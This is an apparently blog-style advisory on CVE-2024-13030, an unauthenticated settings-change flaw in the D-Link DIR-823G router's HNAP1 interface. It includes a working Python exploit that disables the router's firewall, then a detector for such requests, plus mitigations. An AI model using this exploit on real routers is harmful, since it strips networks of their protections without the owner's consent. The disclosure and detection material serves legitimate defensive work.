CVE-2024-13030 - Critical Remote Exploit in D-Link DIR-823G Web Management Interface

---

Introduction

In late December 2024, a critical vulnerability was disclosed in the D-Link DIR-823G wireless router (firmware version 1.02B05_20181207). Registered as CVE-2024-13030, this flaw affects multiple web management functions exposed through the /HNAP1/ endpoint. It allows a remote attacker to bypass access controls and change vital router settings without any authorization.

This post breaks down how the vulnerability works, shows a request that triggers it, links the original references, and describes exploitation scenarios and mitigations.

- Product: D-Link DIR-823G

- Firmware: 1.02B05_20181207 (possibly others)

- Component: Web Management Interface (/HNAP1/)

- Affected actions (as listed in the CVE record): SetAutoRebootSettings, SetClientInfo, SetDMZSettings, SetFirewallSettings, SetParentsControlInfo, SetQoSSettings, SetVirtualServerSettings

- CVE: CVE-2024-13030

The Vulnerability: Weak Access Controls

The affected HNAP1 actions (SetFirewallSettings, SetVirtualServerSettings and the other Set* handlers) are supposed to enforce authentication and only let a logged-in administrator make changes. In the vulnerable firmware that access-control check is not enforced, so any client on the LAN, and any client on the internet if remote management is enabled, can send a crafted HTTP request that modifies these settings.

How the Attack Works

Attackers craft an HTTP POST request to the /HNAP1/ endpoint carrying a properly formatted SOAP/XML body, with no login session and no HNAP_AUTH header. The router processes the request as if it came from an authenticated administrator, which lets the attacker, among other things, disable the firewall (SetFirewallSettings), add port-forwarding rules that expose internal hosts (SetVirtualServerSettings), and change parental or client restrictions.

Sample Exploit Code

Below is a Python snippet using the requests library to exploit the SetFirewallSettings action. It sends a single unauthenticated request that turns the SPI firewall, the IPv6 firewall and anti-spoofing checks off.

> WARNING: Running this code against systems you do not own is illegal.

import requests

# Router LAN address (192.168.0.1 is the usual D-Link default; adjust for your network)
router_ip = "http://192.168.0.1"

# Target endpoint
url = router_ip + "/HNAP1/"

# Request headers: note there is no HNAP_AUTH header and no session cookie
headers = {
    "Content-Type": "text/xml; charset=utf-8",
    "SOAPAction": "\"http://purenetworks.com/HNAP1/SetFirewallSettings\"",
}

# SOAP body that turns the SPI firewall, IPv6 firewall and anti-spoofing checks off
xml_data = '''<?xml version="1.0" encoding="utf-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP-ENV:Body>
<SetFirewallSettings xmlns="http://purenetworks.com/HNAP1/">
    <SPIEnabled>false</SPIEnabled>
    <IPv6FirewallEnabled>false</IPv6FirewallEnabled>
    <AntiSpoofChecking>false</AntiSpoofChecking>
</SetFirewallSettings>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>
'''

# Send the request without credentials
try:
    response = requests.post(url, headers=headers, data=xml_data, timeout=10)
except requests.RequestException as exc:
    raise SystemExit(f"Could not reach {url}: {exc}")

if response.status_code == 200:
    # A vulnerable device answers with a SOAP response instead of an authentication error
    print("Exploit sent. Router response:")
    print(response.text)
else:
    print(f"Exploit failed. Status code: {response.status_code}")
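Defenders can spot this attack on the wire: a D-Link HNAP client that has logged in sends an HNAP_AUTH header (an HMAC over the request timestamp and SOAPAction, followed by the timestamp), whereas the exploit request above carries a Set* action with no authentication at all. The detector below is an added example written for this post, not code from the original advisory or from D-Link. It parses raw HTTP requests (the samples are constructed, not captured traffic), takes the HNAP action from the SOAPAction header or, if that header is absent, from the SOAP body, and flags any Set* action that arrives without HNAP_AUTH. The 192.168.0.1 address, the placeholder HNAP_AUTH value and the parameter names in the samples other than those used in the exploit above are assumptions.

```python
"""Flag unauthenticated HNAP1 Set* requests (added detection example)."""
import xml.etree.ElementTree as ET

SOAP_NS = "{http://schemas.xmlsoap.org/soap/envelope/}"
HNAP_NS = "http://purenetworks.com/HNAP1/"


def parse_http_request(raw):
    """Split a raw HTTP/1.x request into (method, path, headers, body).
    Header names are lower-cased so lookups are case-insensitive."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    parts = request_line.split(" ", 2)
    method, path = (parts[0], parts[1]) if len(parts) >= 2 else (None, None)
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def hnap_body_action(body):
    """Return (action, params) from the SOAP body, or (None, {}) if it is not HNAP."""
    try:
        root = ET.fromstring(body)
    except ET.ParseError:
        return None, {}
    soap_body = root.find(SOAP_NS + "Body")
    if soap_body is None or len(soap_body) == 0:
        return None, {}
    action_el = soap_body[0]
    if not action_el.tag.startswith("{" + HNAP_NS + "}"):
        return None, {}
    action = action_el.tag.split("}", 1)[1]
    params = {c.tag.split("}", 1)[-1]: (c.text or "").strip() for c in action_el}
    return action, params


def classify(raw):
    """Classify one request: None for non-HNAP traffic, otherwise a finding dict."""
    method, path, headers, body = parse_http_request(raw)
    if method != "POST" or not (path or "").startswith("/HNAP1"):
        return None
    header_action = headers.get("soapaction", "").strip('"')
    header_action = header_action[len(HNAP_NS):] if header_action.startswith(HNAP_NS) else None
    body_action, params = hnap_body_action(body)
    action = header_action or body_action
    if not action:
        return None
    # D-Link HNAP clients that have logged in send HNAP_AUTH ("<HMAC> <timestamp>");
    # the exploit request carries no such header.
    authenticated = "hnap_auth" in headers
    severity = "ALERT" if action.startswith("Set") and not authenticated else "INFO"
    return {
        "severity": severity,
        "action": action,
        "authenticated": authenticated,
        "params": params,
        # An attacker may send a harmless SOAPAction with a different action in the body.
        "action_mismatch": bool(header_action and body_action and header_action != body_action),
    }


def scan(raw_requests):
    """Return only the ALERT-level findings for a batch of raw requests."""
    return [f for f in map(classify, raw_requests) if f and f["severity"] == "ALERT"]


def _request(action, inner_xml="", extra_headers=(), with_soapaction=True):
    """Build a constructed raw HNAP request for the samples below (not captured traffic)."""
    body = ('<?xml version="1.0" encoding="utf-8"?>'
            '<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">'
            '<SOAP-ENV:Body><%s xmlns="%s">%s</%s></SOAP-ENV:Body></SOAP-ENV:Envelope>'
            % (action, HNAP_NS, inner_xml, action))
    lines = ["POST /HNAP1/ HTTP/1.1", "Host: 192.168.0.1",  # assumed LAN address
             "Content-Type: text/xml; charset=utf-8"]
    if with_soapaction:
        lines.append('SOAPAction: "%s%s"' % (HNAP_NS, action))
    lines.extend(extra_headers)
    return "\r\n".join(lines) + "\r\n\r\n" + body


# Constructed samples. The HNAP_AUTH value is a placeholder, not a real HMAC.
AUTH = ("HNAP_AUTH: 0123456789ABCDEF0123456789ABCDEF 1700000000", "Cookie: uid=placeholder")
SAMPLE_EXPLOIT = _request("SetFirewallSettings",
                          "<SPIEnabled>false</SPIEnabled><IPv6FirewallEnabled>false</IPv6FirewallEnabled>")
SAMPLE_NO_SOAPACTION = _request("SetVirtualServerSettings", "<Enabled>true</Enabled>",
                                with_soapaction=False)  # assumed parameter name
SAMPLE_AUTHED_SET = _request("SetFirewallSettings", "<SPIEnabled>true</SPIEnabled>", AUTH)
SAMPLE_LEGIT_GET = _request("GetDeviceSettings", extra_headers=AUTH)
SAMPLE_OTHER = "GET /index.html HTTP/1.1\r\nHost: 192.168.0.1\r\n\r\n"
SAMPLES = [SAMPLE_OTHER, SAMPLE_EXPLOIT, SAMPLE_LEGIT_GET, SAMPLE_NO_SOAPACTION, SAMPLE_AUTHED_SET]

if __name__ == "__main__":
    for finding in scan(SAMPLES):
        print(finding["severity"], finding["action"], finding["params"])
```

Feed the detector from whatever already sees the router's HTTP traffic (a proxy, an IDS or a packet capture split into requests). Checking the body as well as the SOAPAction header matters because the firmware, not the attacker, decides which of the two names the action that runs; an ALERT on a Set* action with no HNAP_AUTH is exactly the request shape the exploit above produces.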

References

- Official CVE record: CVE-2024-13030
- D-Link DIR-823G Product Page

Public Exploit Disclosure:

- Exploit Database #52471
- Packet Storm Security
- Technical Advisory: GitHub PoC

Impact and Mitigation

Because the affected actions cover the firewall, port-forwarding and parental/client-restriction settings, a single unauthenticated request can expose internal hosts to the internet or change which clients are restricted. If remote management is enabled, the risk increases massively, because the attack can then be carried out from anywhere on the internet rather than only from the LAN.

1. Update Firmware: If D-Link has released a firmware newer than 1.02B05_20181207 for your hardware revision, install it; if no fixed version is available, rely on the steps below.

2. Disable Remote Management: Turn off remote (WAN-side) management in the router's web interface so that /HNAP1/ is reachable only from the LAN.

3. Firewall External Access: Use a firewall to block all inbound WAN-side access to the router's management ports except what you genuinely need.

Conclusion

CVE-2024-13030 is a major security flaw in D-Link DIR-823G routers running firmware 1.02B05_20181207. By sending crafted HTTP POST requests to /HNAP1/, anyone who can reach the web interface can change the router's most important network settings. If you use this router, update the firmware or apply the mitigation steps above immediately.

Stay safe, and always keep your devices up-to-date!


*If you found this post useful, share it to help others protect their networks. For more details, always refer to the official CVE and vendor advisories.*

Timeline

Published on: 12/30/2024 01:15:06 UTC